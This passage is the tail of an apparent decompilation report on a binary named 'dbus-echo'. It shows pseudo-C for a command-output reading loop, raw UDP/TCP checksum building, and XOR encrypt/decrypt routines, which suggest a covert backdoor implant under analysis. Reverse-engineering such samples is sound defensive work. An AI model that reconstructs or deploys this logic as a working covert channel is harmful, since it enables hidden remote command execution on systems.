    *((rbp - 0x40)) = rax;
    eax = 0;
    rdi = *((rbp - 0x40));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rax--;
    eax = (int32_t) ax;
    *((rbp - 0x24)) = eax;
    goto label_1;
    do {
        al = fgetc (*((rbp - 0x10)));
        *((rbp - 1)) = al;
        if (*((rbp - 1)) == 0xff) {
            goto label_2;
        }
        eax = *((rbp - 4));
        rdx = rax;
        rdx += *((rbp - 0x20));
        eax = *((rbp - 1));
        *(rdx) = al;
        *((rbp - 4))++;
label_0:
    } while (*((rbp - 4)) <= 0x4af);
label_2:
    eax = 0;
    pclose (*((rbp - 0x10)));
    eax = *((rbp - 4));
    *((rbp - 0x24)) = eax;
label_1:
    eax = *((rbp - 0x24));
    return rax;
}

--- sym.udp_tcp_checksum ---
/* r2dec pseudo code output (r2 6.0.8) */
/* /data/shared/dbus-echo @ 0x4016b8 */
#include <stdint.h>
 
uint64_t udp_tcp_checksum (int64_t arg1, int64_t arg2, int64_t arg3, int64_t arg4) {
    int64_t var_61ch;
    int64_t var_618h;
    int64_t var_60ch;
    int64_t var_608h;
    int64_t var_604h;
    void  s;
    int64_t var_20h;
    int64_t var_1ch;
    int64_t var_18h;
    int64_t var_17h;
    int64_t var_16h;
    size_t n;
    int64_t var_4h;
    rsi = arg1;
    rdx = arg2;
    rcx = arg3;
    r8 = arg4;
    *((rbp - 0x608)) = esi;
    *((rbp - 0x60c)) = edx;
    *((rbp - 0x618)) = rcx;
    eax = r8d;
    *((rbp - 0x604)) = dil;
    *((rbp - 0x61c)) = ax;
    *((rbp - 6)) = 0xc;
    eax = *((rbp - 0x60c));
    *((rbp - 0x20)) = eax;
    eax = *((rbp - 0x608));
    *((rbp - 0x1c)) = eax;
    *((rbp - 0x18)) = 0;
    eax = *((rbp - 0x604));
    *((rbp - 0x17)) = al;
    edi = *((rbp - 0x61c));
    ax = htons ();
    *((rbp - 0x16)) = ax;
    edx = *((rbp - 6));
    eax = *((rbp - 0x61c));
    eax = rdx + rax;
    *((rbp - 4)) = eax;
    memset (rbp - 0x600, 0, 0x5dc);
    ecx = *((rbp - 6));
    rax = rbp - 0x600;
    rdx = rbp - 0x20;
    rdi = rax;
    rsi = rdx;
    do {
        *(rdi) = *(rsi);
        rcx--;
        rsi++;
        rdi++;
    } while (rcx != 0);
    ecx = *((rbp - 0x61c));
    eax = *((rbp - 6));
    rdx = rax;
    rax = rbp - 0x600;
    rax += rdx;
    rdx = *((rbp - 0x618));
    rdi = rax;
    rsi = rdx;
    *(rdi) = *(rsi);
    rcx--;
    rsi++;
    rdi++;
    rdi = rbp - 0x600;
    esi = *((rbp - 4));
    ax = checksum ();
    eax = (int32_t) ax;
    return rax;
}

--- sym.__libc_csu_init ---
//WARNING: Removing unreachable block (ram,0x004017fa)
//WARNING: Removing unreachable block (ram,0x00401800)

void sym.__libc_csu_init(ulong arg1,ulong arg2,ulong arg3)

{
    sym._init();
    return;
}

--- sym.checksum ---
uint32_t sym.checksum(uint16_t *arg1,ulong arg2)

{
    int64_t iVar1;
    int var_1ch;
    uint16_t *var_18h;
    uint64_t var_8h;
    
    var_8h = 0;
    var_18h = arg1;
    for (var_1ch = arg2; 1 < var_1ch; var_1ch = var_1ch + -2) {
        var_8h = var_8h + *var_18h;
        var_18h = var_18h + 1;
    }
    if (var_1ch != 0) {
        var_8h = var_8h + *var_18h;
    }
    iVar1 = (var_8h >> 0x10) + (var_8h & 0xffff);
    return ~(iVar1 + (iVar1 >> 0x10)) & 0xffff;
}

--- sym.myDecryptFun ---
//WARNING: Variable defined which should be unmapped: var_5h

uint16_t sym.myDecryptFun(int64_t arg1,ulong noname_1,int64_t arg2,ulong noname_3,int64_t arg3)

{
    uint16_t in_CX;
    uint8_t in_SIL;
    ulong var_38h;
    ulong var_28h;
    ulong var_18h;
    ulong var_5h;
    
    var_5h._0_1_ = 0;
    for (var_5h._1_4_ = 0; var_5h._1_4_ < in_CX; var_5h._1_4_ = var_5h._1_4_ + 1) {
        if (in_SIL <= var_5h) {
            var_5h._0_1_ = 0;
        }
        *(var_5h._1_4_ + arg3) = *(var_5h._1_4_ + arg2) ^ *(var_5h + arg1);
        var_5h._0_1_ = var_5h + 1;
    }
    return in_CX;
}

--- sym.myEncryptFun ---
//WARNING: Variable defined which should be unmapped: var_5h

uint16_t sym.myEncryptFun(int64_t arg1,ulong noname_1,int64_t arg2,ulong noname_3,int64_t arg3)

{
    uint16_t in_CX;
    uint8_t in_SIL;
    ulong var_38h;
    ulong var_28h;
    ulong var_18h;
    ulong var_5h;
    
    var_5h._0_1_ = 0;
    for (var_5h._1_4_ = 0; var_5h._1_4_ < in_CX; var_5h._1_4_ = var_5h._1_4_ + 1) {
        if (in_SIL <= var_5h) {
            var_5h._0_1_ = 0;
        }
        *(var_5h._1_4_ + arg3) = *(var_5h._1_4_ + arg2) ^ *(var_5h + arg1);
        var_5h._0_1_ = var_5h + 1;
    }
    return in_CX;
}

--- sym.__do_global_dtors_aux ---
//WARNING: Removing unreachable block (ram,0x00400b21)

void sym.__do_global_dtors_aux(void)

{
    if (obj.completed.6145 == 0x0) {
        obj.completed.6145 = 0x1;
    }
    return;
}

--- sym.__do_global_ctors_aux ---
void sym.__do_global_ctors_aux(void)

{
    code *pcVar1;
    code *pcVar2;
    
    pcVar2 = segment.LOAD1;
    pcVar1 = _segment.LOAD1;
    if (_segment.LOAD1 != 0xffffffffffffffff) {
        do {
            pcVar2 = pcVar2 + -8;
            (*pcVar1)();
            pcVar1 = *pcVar2;
        } while (*pcVar2 != 0xffffffffffffffff);
    }
    return;
}

======================================================================
END OF REPORT
======================================================================